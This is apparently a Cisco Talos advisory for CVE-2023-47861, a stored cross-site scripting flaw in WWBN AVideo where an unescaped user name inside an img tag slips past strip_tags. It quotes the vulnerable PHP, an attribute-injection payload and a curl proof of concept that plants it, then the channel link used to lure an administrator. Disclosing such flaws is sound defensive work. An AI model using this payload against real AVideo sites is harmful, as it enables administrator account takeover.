CVE-2023-47861
A cross-site scripting (xss) vulnerability exists in the channelBody.php user name functionality of WWBN AVideo 11.6 and dev master commit 15fed957fb. A specially crafted HTTP request can lead to arbitrary Javascript execution. An attacker can get a user to visit a webpage to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
WWBN AVideo 11.6
WWBN AVideo dev master commit 15fed957fb
AVideo - https://github.com/WWBN/AVideo
9.0 - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
CWE-79 - Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)
AVideo is a web application, mostly written in PHP, that can be used to create an audio/video sharing website. It allows users to import videos from various sources, encode and share them in various ways. Users can sign up to the website in order to share videos, while viewers have anonymous access to the publicly-available contents. The platform provides plugins for features like live streaming, skins, YouTube uploads and more.
The PHP file view/channelBody.php is vulnerable to an XSS issue due to improper sanitization of the user name.
channelBody.php is included by channel.php:
include $global['systemRootPath'] . 'view/channelBody.php';
Inside channelBody.php, the user photo is shown:
} else {
?>
<div class="clearfix" style="clear: both;"></div>
<a href="<?php echo User::getWebsite($user_id); ?>" target="_blank">
[1] <img src="<?php echo User::getPhoto($user_id); ?>" alt="<?php echo $user->_getName(); ?>" class="img img-responsive img-thumbnail" style="max-width: 100px;" />
</a>
<?php
}
At [1], the user name is echoed using $user->_getName():
public function _getName()
{
return $this->name;
}
This function simply returns the name field of the User object. The name field is originally set using setName:
public function setName($name)
{
$this->name = strip_tags($name);
}
strip_tags is used to remove tags, which could be used to inject arbitrary JavaScript. However, since the user name is echoed inside an <img> tag, there’s no need to inject tags in order to execute arbitrary JavaScript.
For example, a privileged attacker could change their user name to someuser" onload="alert(1), which would execute alert(1) without using tags and thus bypass the strip_tag in setName.
Exploitation leads to a straightforward stored cross-site scripting issue (XSS) when visiting a user’s channel. This can be used by an attacker, in the worst case, to take over an administrator account, for example by tricking an administrator into browsing the attacker’s channel.
This proof-of-concept calls alert(1):
$ curl -k $'https://localhost/objects/userUpdate.json.php' \
-H 'Cookie: 84b11d010cced71edffee7aa62c4eda0=bir8alr05n4s0tjaqninjjnr66' \
-H 'Referer: https://localhost/user' \
--data-raw $'user=user1&pass=&email=user1@localhost&phone=&name=someuser" onload="alert(1)&about=&channelName=User1&donationLink=&analyticsCode='
{"error":false,"msg":"","users_id":2}
Note the user id is 2.
Trick the administrator into visiting the attacker’s channel by clicking the following URL, which will execute alert(1).
https://localhost/view/channel.php?channelName=2
Make sure to use the user id (2 in this case) for channelName.
2023-12-14 - Vendor Disclosure
2023-12-15 - Vendor Patch Release
2024-01-10 - Public Release
Discovered by Claudio Bozzato of Cisco Talos.